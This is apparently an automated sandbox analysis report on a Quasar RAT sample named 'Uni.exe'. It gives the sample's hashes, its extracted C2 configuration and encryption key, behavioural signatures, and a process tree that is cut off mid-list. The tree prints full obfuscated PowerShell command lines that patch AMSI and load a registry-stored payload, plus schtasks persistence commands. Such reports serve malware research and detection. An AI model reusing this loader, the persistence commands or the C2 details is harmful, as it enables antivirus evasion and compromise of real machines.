Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 17:28

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    7417c8c73e614f293152575f46134216

  • SHA1

    cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

  • SHA256

    00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

  • SHA512

    897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

  • SSDEEP

    6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:60
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{e958a193-9963-4c23-9ea2-cf892b129985}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3548
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{fe4478b9-0051-4074-b630-a9dc39d9cb95}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:644
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:676
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:948
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:512
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:944
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1052
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1088
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1132
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1168
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2772
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mCXkdBosmkrz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQrnzePqSeFjVJ,[Parameter(Position=1)][Type]$itemsMtXpB)$LLbeBYuINnx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+'le'+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+'n'+''+'s'+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$LLbeBYuINnx.DefineConstructor('RTSp'+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQrnzePqSeFjVJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$LLbeBYuINnx.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'ByS'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$itemsMtXpB,$jQrnzePqSeFjVJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $LLbeBYuINnx.CreateType();}$qhfxpecUiWpvl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'ste'+'m'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ro'+[Char](115)+'o'+'f'+'t'+'.'+''+[Char](87)+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$ZDzpwzKWMdMfbJ=$qhfxpecUiWpvl.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MOAleEdLausBlxfMMlz=mCXkdBosmkrz @([String])([IntPtr]);$xSmgXuSOZSVHWTKuJvfOLi=mCXkdBosmkrz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cJJXSYshHhV=$qhfxpecUiWpvl.GetMethod('G'+[Char](101)+'t'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+'r'+'n'+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DujHIhsutrTluc=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object]('L'+'o'+'a'+[Char](100)+'L'+'i'+''+'b'+''+'r'+'a'+'r'+''+[Char](121)+''+[Char](65)+'')));$AYJBwFEEtVlwgGEgo=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$cJJXSYshHhV,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$lqgfIcf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DujHIhsutrTluc,$MOAleEdLausBlxfMMlz).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+'l');$yEpjVjUFedPqzTNwa=$ZDzpwzKWMdMfbJ.Invoke($Null,@([Object]$lqgfIcf,[Object]('A'+[Char](109)+'s'+[Char](105)+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$TBSoVryaKg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,4,[ref]$TBSoVryaKg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$yEpjVjUFedPqzTNwa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYJBwFEEtVlwgGEgo,$xSmgXuSOZSVHWTKuJvfOLi).Invoke($yEpjVjUFedPqzTNwa,[uint32]8,0x20,[ref]$TBSoVryaKg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4000
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VHUlKDHOaaXL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fGdQtsyqVZZYAp,[Parameter(Position=1)][Type]$joTUiHyUGU)$nOrjXkmlbTq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+'l'+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsi'+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nOrjXkmlbTq.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fGdQtsyqVZZYAp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$nOrjXkmlbTq.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'eBy'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+'i'+'r'+'t'+''+'u'+'al',$joTUiHyUGU,$fGdQtsyqVZZYAp).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $nOrjXkmlbTq.CreateType();}$sNozhZzIkcwMl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KhXHYMKLDxWdAN=$sNozhZzIkcwMl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$QVeotFJywKvrBXvXUQo=VHUlKDHOaaXL @([String])([IntPtr]);$SyYRqsqyiLxfNsUkbPmJig=VHUlKDHOaaXL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BtnfBJpTPbl=$sNozhZzIkcwMl.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rnel'+[Char](51)+'2'+'.'+'d'+'l'+''+'l'+'')));$DghpFKiqjocmUY=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$SayvemgIQDQzOnRLO=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$BtnfBJpTPbl,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+'t'+'e'+'c'+'t'+'')));$QAjoSlF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DghpFKiqjocmUY,$QVeotFJywKvrBXvXUQo).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vmmOrbSJWRDLUTNVw=$KhXHYMKLDxWdAN.Invoke($Null,@([Object]$QAjoSlF,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$KMmjuSvLTi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,4,[ref]$KMmjuSvLTi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vmmOrbSJWRDLUTNVw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SayvemgIQDQzOnRLO,$SyYRqsqyiLxfNsUkbPmJig).Invoke($vmmOrbSJWRDLUTNVw,[uint32]8,0x20,[ref]$KMmjuSvLTi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WAR'+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4048
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:3428
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1260
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1312
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                          1⤵
                            PID:1428
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1440
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1456
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                  • Modifies registry class
                                  PID:2676
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1504
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1512
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1672
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1708
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1764
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1800
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1904
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:1160
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1448
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1544
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                      PID:1692
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2092
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2176
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2248
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2308
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2472
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2480
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2664
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2724
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2752
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2824
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2848
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2860
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:2932
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2768
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3400
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3564
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Uni.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1724
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2968
                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1080
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:3928
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1540
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2640
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:4032
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3688
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3868
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4020
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:2372
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4376
                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4180
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:3776
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:4980
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:756
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2552
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:3512
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:5000
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:4876
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4320
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
